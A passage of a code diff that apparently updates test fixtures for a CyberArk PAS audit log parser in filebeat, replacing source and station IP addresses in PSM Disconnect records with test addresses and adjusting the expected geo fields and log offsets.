07:08:11","IsoTimestamp":"2021-03-15T14:08:11Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"302","Desc":"PSM Disconnect","Severity":"Info","Issuer":"Administrator","Action":"PSM Disconnect","SourceUser":"","TargetUser":"","Safe":"PSM","File":"Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian","Station":"81.2.69.143","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionDuration=00:00:06;SessionID=f5725611-ca57-4a2a-a089-f45b3174a358;SrcHost=67.43.156.14;User=adrian;","Message":"PSM Disconnect","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSHKeys"},{"Name":"UserName","Value":"adrian"},{"Name":"Address","Value":"34.123.103.115"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} +<5>1 2021-03-15T14:08:36Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 15 07:08:36\n 2021-03-15T14:08:36Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 302\n PSM Disconnect\n Info\n Administrator\n PSM Disconnect\n \n \n partner\n Root\\Operating System-UnixSSH-34.123.103.115-testark\n 81.2.69.143\n \n \n \n \n ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionDuration=00:00:09;SessionID=7db90436-8a1a-4203-9a96-65137625ab2d;SrcHost=67.43.156.14;User=testark;\n PSM Disconnect\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 15 07:08:36","IsoTimestamp":"2021-03-15T14:08:36Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"302","Desc":"PSM Disconnect","Severity":"Info","Issuer":"Administrator","Action":"PSM Disconnect","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating 
System-UnixSSH-34.123.103.115-testark","Station":"81.2.69.143","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionDuration=00:00:09;SessionID=7db90436-8a1a-4203-9a96-65137625ab2d;SrcHost=67.43.156.14;User=testark;","Message":"PSM Disconnect","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSH"},{"Name":"UserName","Value":"testark"},{"Name":"Address","Value":"34.123.103.115"},{"Name":"ResetImmediately","Value":"ReconcileTask"},{"Name":"CPMStatus","Value":"failure"},{"Name":"RetriesCount","Value":"0"},{"Name":"LastFailDate","Value":"1615814025"},{"Name":"LastTask","Value":"ReconcileTask"},{"Name":"LastSuccessVerification","Value":"1615803764"},{"Name":"CPMErrorDetails","Value":"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"},{"Name":"UseSudoOnReconcile","Value":"Yes"}]}}}} +<5>1 2021-03-15T15:00:21Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 15 08:00:21\n 2021-03-15T15:00:21Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 302\n PSM Disconnect\n Info\n Administrator\n PSM Disconnect\n \n \n partner\n Root\\Operating System-UnixSSH-34.123.103.115-testark\n 81.2.69.143\n \n \n \n \n ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionDuration=00:49:12;SessionID=27f74dce-f5d5-4c94-bf99-ca6aafe2c518;SrcHost=67.43.156.14;User=testark;\n PSM Disconnect\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 15 08:00:21","IsoTimestamp":"2021-03-15T15:00:21Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"302","Desc":"PSM 
Disconnect","Severity":"Info","Issuer":"Administrator","Action":"PSM Disconnect","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-UnixSSH-34.123.103.115-testark","Station":"81.2.69.143","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionDuration=00:49:12;SessionID=27f74dce-f5d5-4c94-bf99-ca6aafe2c518;SrcHost=67.43.156.14;User=testark;","Message":"PSM Disconnect","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSH"},{"Name":"UserName","Value":"testark"},{"Name":"Address","Value":"34.123.103.115"},{"Name":"ResetImmediately","Value":"ReconcileTask"},{"Name":"CPMStatus","Value":"failure"},{"Name":"RetriesCount","Value":"1"},{"Name":"LastFailDate","Value":"1615819476"},{"Name":"LastTask","Value":"ReconcileTask"},{"Name":"LastSuccessVerification","Value":"1615803764"},{"Name":"CPMErrorDetails","Value":"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"},{"Name":"UseSudoOnReconcile","Value":"Yes"}]}}}} diff --git a/x-pack/filebeat/module/cyberarkpas/audit/test/302_psm_disconnect.log-expected.json b/x-pack/filebeat/module/cyberarkpas/audit/test/302_psm_disconnect.log-expected.json index c785d0f3feec..74c0eb01cbfa 100644 --- a/x-pack/filebeat/module/cyberarkpas/audit/test/302_psm_disconnect.log-expected.json +++ b/x-pack/filebeat/module/cyberarkpas/audit/test/302_psm_disconnect.log-expected.json 
@@ -94,18 +94,13 @@ "cyberarkpas.audit.iso_timestamp": "2021-03-11T17:38:26Z", "cyberarkpas.audit.issuer": "Administrator", "cyberarkpas.audit.message": "PSM Disconnect", - "cyberarkpas.audit.raw": "\n\n \n yes\n Mar 11 09:38:26\n 2021-03-11T17:38:26Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 302\n PSM Disconnect\n Info\n Administrator\n PSM Disconnect\n \n \n PSM\n Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian\n 81.32.170.205\n \n \n \n \n ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionDuration=00:00:13;SessionID=87012dcc-8290-11eb-949e-080027efd402;SrcHost=127.0.0.1;User=adrian;\n PSM Disconnect\n \n \n \n \n \n \n \n \n \n\n", + "cyberarkpas.audit.raw": "\n\n \n yes\n Mar 11 09:38:26\n 2021-03-11T17:38:26Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 302\n PSM Disconnect\n Info\n Administrator\n PSM Disconnect\n \n \n PSM\n Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian\n 67.43.156.14\n \n \n \n \n ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionDuration=00:00:13;SessionID=87012dcc-8290-11eb-949e-080027efd402;SrcHost=127.0.0.1;User=adrian;\n PSM Disconnect\n \n \n \n \n \n \n \n \n \n\n", "cyberarkpas.audit.rfc5424": true, "cyberarkpas.audit.safe": "PSM", "cyberarkpas.audit.severity": "Info", - "cyberarkpas.audit.station": "81.32.170.205", + "cyberarkpas.audit.station": "67.43.156.14", "cyberarkpas.audit.timestamp": "Mar 11 09:38:26", "destination.address": "34.123.103.115", - "destination.geo.continent_name": "North America", - "destination.geo.country_iso_code": "US", - "destination.geo.country_name": "United States", - "destination.geo.location.lat": 37.751, - "destination.geo.location.lon": -97.822, "destination.ip": "34.123.103.115", "destination.user.name": "adrian", "event.action": "psm disconnect", 
@@ -138,7 +133,7 @@
 "related.ip": [
 "127.0.0.1",
 "34.123.103.115",
- "81.32.170.205"
+ "67.43.156.14"
 ],
 "related.user": [
 "Administrator",
@@ -176,18 +171,13 @@ "cyberarkpas.audit.iso_timestamp": "2021-03-11T17:47:01Z", "cyberarkpas.audit.issuer": "Administrator", "cyberarkpas.audit.message": "PSM Disconnect", - "cyberarkpas.audit.raw": "\n\n \n yes\n Mar 11 09:47:01\n 2021-03-11T17:47:01Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 302\n PSM Disconnect\n Info\n Administrator\n PSM Disconnect\n \n \n PSM\n Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian\n 81.32.170.205\n \n \n \n \n ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionDuration=00:00:11;SessionID=ba22b012-8291-11eb-b981-080027efd402;SrcHost=127.0.0.1;User=adrian;\n PSM Disconnect\n \n \n \n \n \n \n \n \n \n\n", + "cyberarkpas.audit.raw": "\n\n \n yes\n Mar 11 09:47:01\n 2021-03-11T17:47:01Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 302\n PSM Disconnect\n Info\n Administrator\n PSM Disconnect\n \n \n PSM\n Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian\n 67.43.156.14\n \n \n \n \n ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionDuration=00:00:11;SessionID=ba22b012-8291-11eb-b981-080027efd402;SrcHost=127.0.0.1;User=adrian;\n PSM Disconnect\n \n \n \n \n \n \n \n \n \n\n", "cyberarkpas.audit.rfc5424": true, "cyberarkpas.audit.safe": "PSM", "cyberarkpas.audit.severity": "Info", - "cyberarkpas.audit.station": "81.32.170.205", + "cyberarkpas.audit.station": "67.43.156.14", "cyberarkpas.audit.timestamp": "Mar 11 09:47:01", "destination.address": "34.123.103.115", - "destination.geo.continent_name": "North America", - "destination.geo.country_iso_code": "US", - "destination.geo.country_name": "United States", - "destination.geo.location.lat": 37.751, - "destination.geo.location.lon": -97.822, "destination.ip": "34.123.103.115", "destination.user.name": "adrian", "event.action": "psm disconnect", 
@@ -209,7 +199,7 @@
 "fileset.name": "audit",
 "host.name": "VAULT",
 "input.type": "log",
- "log.offset": 5222,
+ "log.offset": 5220,
 "log.syslog.priority": "5",
 "network.application": "ssh",
 "network.direction": "outbound",
@@ -220,7 +210,7 @@
 "related.ip": [
 "127.0.0.1",
 "34.123.103.115",
- "81.32.170.205"
+ "67.43.156.14"
 ],
 "related.user": [
 "Administrator",
@@ -258,18 +248,13 @@ "cyberarkpas.audit.iso_timestamp": "2021-03-11T17:48:40Z", "cyberarkpas.audit.issuer": "Administrator", "cyberarkpas.audit.message": "PSM Disconnect", - "cyberarkpas.audit.raw": "\n\n \n yes\n Mar 11 09:48:40\n 2021-03-11T17:48:40Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 302\n PSM Disconnect\n Info\n Administrator\n PSM Disconnect\n \n \n PSM\n Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian\n 81.32.170.205\n \n \n \n \n ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionDuration=00:00:12;SessionID=f6acbf00-8291-11eb-b9ba-080027efd402;SrcHost=10.0.2.2;User=adrian;\n PSM Disconnect\n \n \n \n \n \n \n \n \n \n\n", + "cyberarkpas.audit.raw": "\n\n \n yes\n Mar 11 09:48:40\n 2021-03-11T17:48:40Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 302\n PSM Disconnect\n Info\n Administrator\n PSM Disconnect\n \n \n PSM\n Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian\n 67.43.156.14\n \n \n \n \n ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionDuration=00:00:12;SessionID=f6acbf00-8291-11eb-b9ba-080027efd402;SrcHost=10.0.2.2;User=adrian;\n PSM Disconnect\n \n \n \n \n \n \n \n \n \n\n", "cyberarkpas.audit.rfc5424": true, "cyberarkpas.audit.safe": "PSM", "cyberarkpas.audit.severity": "Info", - "cyberarkpas.audit.station": "81.32.170.205", + "cyberarkpas.audit.station": "67.43.156.14", "cyberarkpas.audit.timestamp": "Mar 11 09:48:40", "destination.address": "34.123.103.115", - "destination.geo.continent_name": "North America", - "destination.geo.country_iso_code": "US", - "destination.geo.country_name": "United States", - "destination.geo.location.lat": 37.751, - "destination.geo.location.lon": -97.822, "destination.ip": "34.123.103.115", "destination.user.name": "adrian", "event.action": "psm disconnect", 
@@ -291,7 +276,7 @@
 "fileset.name": "audit",
 "host.name": "VAULT",
 "input.type": "log",
- "log.offset": 7810,
+ "log.offset": 7806,
 "log.syslog.priority": "5",
 "network.application": "ssh",
 "network.direction": "outbound",
@@ -302,7 +287,7 @@
 "related.ip": [
 "10.0.2.2",
 "34.123.103.115",
- "81.32.170.205"
+ "67.43.156.14"
 ],
 "related.user": [
 "Administrator",
@@ -340,18 +325,13 @@ "cyberarkpas.audit.iso_timestamp": "2021-03-11T17:55:02Z", "cyberarkpas.audit.issuer": "Administrator", "cyberarkpas.audit.message": "PSM Disconnect", - "cyberarkpas.audit.raw": "\n\n \n yes\n Mar 11 09:55:02\n 2021-03-11T17:55:02Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 302\n PSM Disconnect\n Info\n Administrator\n PSM Disconnect\n \n \n PSM\n Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian\n 81.32.170.205\n \n \n \n \n ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionDuration=00:00:12;SessionID=d8ff4d32-8292-11eb-b962-080027efd402;SrcHost=10.0.2.2;User=adrian;\n PSM Disconnect\n \n \n \n \n \n \n \n \n \n\n", + "cyberarkpas.audit.raw": "\n\n \n yes\n Mar 11 09:55:02\n 2021-03-11T17:55:02Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 302\n PSM Disconnect\n Info\n Administrator\n PSM Disconnect\n \n \n PSM\n Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian\n 67.43.156.14\n \n \n \n \n ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionDuration=00:00:12;SessionID=d8ff4d32-8292-11eb-b962-080027efd402;SrcHost=10.0.2.2;User=adrian;\n PSM Disconnect\n \n \n \n \n \n \n \n \n \n\n", "cyberarkpas.audit.rfc5424": true, "cyberarkpas.audit.safe": "PSM", "cyberarkpas.audit.severity": "Info", - "cyberarkpas.audit.station": "81.32.170.205", + "cyberarkpas.audit.station": "67.43.156.14", "cyberarkpas.audit.timestamp": "Mar 11 09:55:02", "destination.address": "34.123.103.115", - "destination.geo.continent_name": "North America", - "destination.geo.country_iso_code": "US", - "destination.geo.country_name": "United States", - "destination.geo.location.lat": 37.751, - "destination.geo.location.lon": -97.822, "destination.ip": "34.123.103.115", "destination.user.name": "adrian", "event.action": "psm disconnect", 
@@ -373,7 +353,7 @@
 "fileset.name": "audit",
 "host.name": "VAULT",
 "input.type": "log",
- "log.offset": 10396,
+ "log.offset": 10390,
 "log.syslog.priority": "5",
 "network.application": "ssh",
 "network.direction": "outbound",
@@ -384,7 +364,7 @@
 "related.ip": [
 "10.0.2.2",
 "34.123.103.115",
- "81.32.170.205"
+ "67.43.156.14"
 ],
 "related.user": [
 "Administrator",
@@ -422,18 +402,13 @@ "cyberarkpas.audit.iso_timestamp": "2021-03-11T17:56:42Z", "cyberarkpas.audit.issuer": "Administrator", "cyberarkpas.audit.message": "PSM Disconnect", - "cyberarkpas.audit.raw": "\n\n \n yes\n Mar 11 09:56:42\n 2021-03-11T17:56:42Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 302\n PSM Disconnect\n Info\n Administrator\n PSM Disconnect\n \n \n PSM\n Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian\n 81.32.170.205\n \n \n \n \n ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionDuration=00:00:12;SessionID=173dd46a-8293-11eb-afcb-080027efd402;SrcHost=10.0.2.2;User=adrian;\n PSM Disconnect\n \n \n \n \n \n \n \n \n \n\n", + "cyberarkpas.audit.raw": "\n\n \n yes\n Mar 11 09:56:42\n 2021-03-11T17:56:42Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 302\n PSM Disconnect\n Info\n Administrator\n PSM Disconnect\n \n \n PSM\n Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian\n 67.43.156.14\n \n \n \n \n ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionDuration=00:00:12;SessionID=173dd46a-8293-11eb-afcb-080027efd402;SrcHost=10.0.2.2;User=adrian;\n PSM Disconnect\n \n \n \n \n \n \n \n \n \n\n", "cyberarkpas.audit.rfc5424": true, "cyberarkpas.audit.safe": "PSM", "cyberarkpas.audit.severity": "Info", - "cyberarkpas.audit.station": "81.32.170.205", + "cyberarkpas.audit.station": "67.43.156.14", "cyberarkpas.audit.timestamp": "Mar 11 09:56:42", "destination.address": "34.123.103.115", - "destination.geo.continent_name": "North America", - "destination.geo.country_iso_code": "US", - "destination.geo.country_name": "United States", - "destination.geo.location.lat": 37.751, - "destination.geo.location.lon": -97.822, "destination.ip": "34.123.103.115", "destination.user.name": "adrian", "event.action": "psm disconnect", 
@@ -455,7 +430,7 @@
 "fileset.name": "audit",
 "host.name": "VAULT",
 "input.type": "log",
- "log.offset": 12982,
+ "log.offset": 12974,
 "log.syslog.priority": "5",
 "network.application": "ssh",
 "network.direction": "outbound",
@@ -466,7 +441,7 @@
 "related.ip": [
 "10.0.2.2",
 "34.123.103.115",
- "81.32.170.205"
+ "67.43.156.14"
 ],
 "related.user": [
 "Administrator",
@@ -504,18 +479,13 @@ "cyberarkpas.audit.iso_timestamp": "2021-03-11T20:23:30Z", "cyberarkpas.audit.issuer": "Administrator", "cyberarkpas.audit.message": "PSM Disconnect", - "cyberarkpas.audit.raw": "\n\n \n yes\n Mar 11 12:23:30\n 2021-03-11T20:23:30Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 302\n PSM Disconnect\n Info\n Administrator\n PSM Disconnect\n \n \n PSM\n Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian\n 81.32.170.205\n \n \n \n \n ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionDuration=00:00:12;SessionID=988b22e8-82a7-11eb-83b9-080027efd402;SrcHost=10.0.2.2;User=adrian;\n PSM Disconnect\n \n \n \n \n \n \n \n \n \n\n", + "cyberarkpas.audit.raw": "\n\n \n yes\n Mar 11 12:23:30\n 2021-03-11T20:23:30Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 302\n PSM Disconnect\n Info\n Administrator\n PSM Disconnect\n \n \n PSM\n Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian\n 67.43.156.14\n \n \n \n \n ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionDuration=00:00:12;SessionID=988b22e8-82a7-11eb-83b9-080027efd402;SrcHost=10.0.2.2;User=adrian;\n PSM Disconnect\n \n \n \n \n \n \n \n \n \n\n", "cyberarkpas.audit.rfc5424": true, "cyberarkpas.audit.safe": "PSM", "cyberarkpas.audit.severity": "Info", - "cyberarkpas.audit.station": "81.32.170.205", + "cyberarkpas.audit.station": "67.43.156.14", "cyberarkpas.audit.timestamp": "Mar 11 12:23:30", "destination.address": "34.123.103.115", - "destination.geo.continent_name": "North America", - "destination.geo.country_iso_code": "US", - "destination.geo.country_name": "United States", - "destination.geo.location.lat": 37.751, - "destination.geo.location.lon": -97.822, "destination.ip": "34.123.103.115", "destination.user.name": "adrian", "event.action": "psm disconnect", 
@@ -537,7 +507,7 @@
 "fileset.name": "audit",
 "host.name": "VAULT",
 "input.type": "log",
- "log.offset": 15568,
+ "log.offset": 15558,
 "log.syslog.priority": "5",
 "network.application": "ssh",
 "network.direction": "outbound",
@@ -548,7 +518,7 @@
 "related.ip": [
 "10.0.2.2",
 "34.123.103.115",
- "81.32.170.205"
+ "67.43.156.14"
 ],
 "related.user": [
 "Administrator",
@@ -587,23 +557,18 @@ "cyberarkpas.audit.extra_details.psmid": "PSMServer", "cyberarkpas.audit.extra_details.session_duration": "00:00:18", "cyberarkpas.audit.extra_details.session_id": "d284c268-2ba0-4366-af52-e33459b073a1", - "cyberarkpas.audit.extra_details.src_host": "81.32.170.205", + "cyberarkpas.audit.extra_details.src_host": "67.43.156.14", "cyberarkpas.audit.file": "Root\\Operating System-UnixSSH-34.123.103.115-testark", "cyberarkpas.audit.iso_timestamp": "2021-03-14T13:49:54Z", "cyberarkpas.audit.issuer": "Administrator", "cyberarkpas.audit.message": "PSM Disconnect", - "cyberarkpas.audit.raw": "\n\n \n yes\n Mar 14 06:49:54\n 2021-03-14T13:49:54Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 302\n PSM Disconnect\n Info\n Administrator\n PSM Disconnect\n \n \n partner\n Root\\Operating System-UnixSSH-34.123.103.115-testark\n 34.71.250.247\n \n \n \n \n ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionDuration=00:00:18;SessionID=d284c268-2ba0-4366-af52-e33459b073a1;SrcHost=81.32.170.205;User=testark;\n PSM Disconnect\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n\n", + "cyberarkpas.audit.raw": "\n\n \n yes\n Mar 14 06:49:54\n 2021-03-14T13:49:54Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 302\n PSM Disconnect\n Info\n Administrator\n PSM Disconnect\n \n \n partner\n Root\\Operating System-UnixSSH-34.123.103.115-testark\n 81.2.69.143\n \n \n \n \n ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionDuration=00:00:18;SessionID=d284c268-2ba0-4366-af52-e33459b073a1;SrcHost=67.43.156.14;User=testark;\n PSM Disconnect\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n\n", "cyberarkpas.audit.rfc5424": true, "cyberarkpas.audit.safe": "partner", "cyberarkpas.audit.severity": "Info", - "cyberarkpas.audit.station": "34.71.250.247", + "cyberarkpas.audit.station": "81.2.69.143", "cyberarkpas.audit.timestamp": "Mar 14 06:49:54", "destination.address": "34.123.103.115", - 
"destination.geo.continent_name": "North America", - "destination.geo.country_iso_code": "US", - "destination.geo.country_name": "United States", - "destination.geo.location.lat": 37.751, - "destination.geo.location.lon": -97.822, "destination.ip": "34.123.103.115", "destination.user.name": "testark", "event.action": "psm disconnect", @@ -625,7 +590,7 @@ "fileset.name": "audit", "host.name": "VAULT", "input.type": "log", - "log.offset": 18154, + "log.offset": 18142, "log.syslog.priority": "5", "network.application": "ssh", "network.direction": "external", @@ -635,24 +600,21 @@ "observer.version": "11.7.0000", "related.ip": [ "34.123.103.115", - "34.71.250.247", - "81.32.170.205" + "67.43.156.14", + "81.2.69.143" ], "related.user": [ "Administrator", "testark" ], "service.type": "cyberarkpas", - "source.address": "81.32.170.205", - "source.geo.city_name": "Barcelona", - "source.geo.continent_name": "Europe", - "source.geo.country_iso_code": "ES", - "source.geo.country_name": "Spain", - "source.geo.location.lat": 41.3891, - "source.geo.location.lon": 2.1611, - "source.geo.region_iso_code": "ES-B", - "source.geo.region_name": "Barcelona", - "source.ip": "81.32.170.205", + "source.address": "67.43.156.14", + "source.geo.continent_name": "Asia", + "source.geo.country_iso_code": "BT", + "source.geo.country_name": "Bhutan", + "source.geo.location.lat": 27.5, + "source.geo.location.lon": 90.5, + "source.ip": "67.43.156.14", "source.user.name": "Administrator", "tags": [ "cyberarkpas.audit", 
@@ -683,23 +645,18 @@ "cyberarkpas.audit.extra_details.psmid": "PSMServer", "cyberarkpas.audit.extra_details.session_duration": "00:00:54", "cyberarkpas.audit.extra_details.session_id": "47747796-03e1-4a11-af39-ab56c00e7732", - "cyberarkpas.audit.extra_details.src_host": "81.32.170.205", + "cyberarkpas.audit.extra_details.src_host": "67.43.156.14", "cyberarkpas.audit.file": "Root\\Operating System-UnixSSH-34.123.103.115-testark", "cyberarkpas.audit.iso_timestamp": "2021-03-14T13:51:35Z", "cyberarkpas.audit.issuer": "Administrator", "cyberarkpas.audit.message": "PSM Disconnect", - "cyberarkpas.audit.raw": "\n\n \n yes\n Mar 14 06:51:35\n 2021-03-14T13:51:35Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 302\n PSM Disconnect\n Info\n Administrator\n PSM Disconnect\n \n \n partner\n Root\\Operating System-UnixSSH-34.123.103.115-testark\n 34.71.250.247\n \n \n \n \n ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionDuration=00:00:54;SessionID=47747796-03e1-4a11-af39-ab56c00e7732;SrcHost=81.32.170.205;User=testark;\n PSM Disconnect\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n\n", + "cyberarkpas.audit.raw": "\n\n \n yes\n Mar 14 06:51:35\n 2021-03-14T13:51:35Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 302\n PSM Disconnect\n Info\n Administrator\n PSM Disconnect\n \n \n partner\n Root\\Operating System-UnixSSH-34.123.103.115-testark\n 81.2.69.143\n \n \n \n \n ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionDuration=00:00:54;SessionID=47747796-03e1-4a11-af39-ab56c00e7732;SrcHost=67.43.156.14;User=testark;\n PSM Disconnect\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n\n", "cyberarkpas.audit.rfc5424": true, "cyberarkpas.audit.safe": "partner", "cyberarkpas.audit.severity": "Info", - "cyberarkpas.audit.station": "34.71.250.247", + "cyberarkpas.audit.station": "81.2.69.143", "cyberarkpas.audit.timestamp": "Mar 14 06:51:35", "destination.address": "34.123.103.115", - 
"destination.geo.continent_name": "North America", - "destination.geo.country_iso_code": "US", - "destination.geo.country_name": "United States", - "destination.geo.location.lat": 37.751, - "destination.geo.location.lon": -97.822, "destination.ip": "34.123.103.115", "destination.user.name": "testark", "event.action": "psm disconnect", @@ -721,7 +678,7 @@ "fileset.name": "audit", "host.name": "VAULT", "input.type": "log", - "log.offset": 21738, + "log.offset": 21720, "log.syslog.priority": "5", "network.application": "ssh", "network.direction": "external", @@ -731,24 +688,21 @@ "observer.version": "11.7.0000", "related.ip": [ "34.123.103.115", - "34.71.250.247", - "81.32.170.205" + "67.43.156.14", + "81.2.69.143" ], "related.user": [ "Administrator", "testark" ], "service.type": "cyberarkpas", - "source.address": "81.32.170.205", - "source.geo.city_name": "Barcelona", - "source.geo.continent_name": "Europe", - "source.geo.country_iso_code": "ES", - "source.geo.country_name": "Spain", - "source.geo.location.lat": 41.3891, - "source.geo.location.lon": 2.1611, - "source.geo.region_iso_code": "ES-B", - "source.geo.region_name": "Barcelona", - "source.ip": "81.32.170.205", + "source.address": "67.43.156.14", + "source.geo.continent_name": "Asia", + "source.geo.country_iso_code": "BT", + "source.geo.country_name": "Bhutan", + "source.geo.location.lat": 27.5, + "source.geo.location.lon": 90.5, + "source.ip": "67.43.156.14", "source.user.name": "Administrator", "tags": [ "cyberarkpas.audit", 
@@ -777,23 +731,18 @@ "cyberarkpas.audit.extra_details.psmid": "PSMServer", "cyberarkpas.audit.extra_details.session_duration": "00:01:35", "cyberarkpas.audit.extra_details.session_id": "29f340df-89e9-405a-beae-0216390cda42", - "cyberarkpas.audit.extra_details.src_host": "81.32.170.205", + "cyberarkpas.audit.extra_details.src_host": "67.43.156.14", "cyberarkpas.audit.file": "Root\\Operating System-UnixSSH-34.123.103.115-testark", "cyberarkpas.audit.iso_timestamp": "2021-03-15T10:33:30Z", "cyberarkpas.audit.issuer": "Administrator", "cyberarkpas.audit.message": "PSM Disconnect", - "cyberarkpas.audit.raw": "\n\n \n yes\n Mar 15 03:33:30\n 2021-03-15T10:33:30Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 302\n PSM Disconnect\n Info\n Administrator\n PSM Disconnect\n \n \n partner\n Root\\Operating System-UnixSSH-34.123.103.115-testark\n 34.71.250.247\n \n \n \n \n ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionDuration=00:01:35;SessionID=29f340df-89e9-405a-beae-0216390cda42;SrcHost=81.32.170.205;User=testark;\n PSM Disconnect\n \n \n \n \n \n \n \n \n \n \n \n \n \n\n", + "cyberarkpas.audit.raw": "\n\n \n yes\n Mar 15 03:33:30\n 2021-03-15T10:33:30Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 302\n PSM Disconnect\n Info\n Administrator\n PSM Disconnect\n \n \n partner\n Root\\Operating System-UnixSSH-34.123.103.115-testark\n 81.2.69.143\n \n \n \n \n 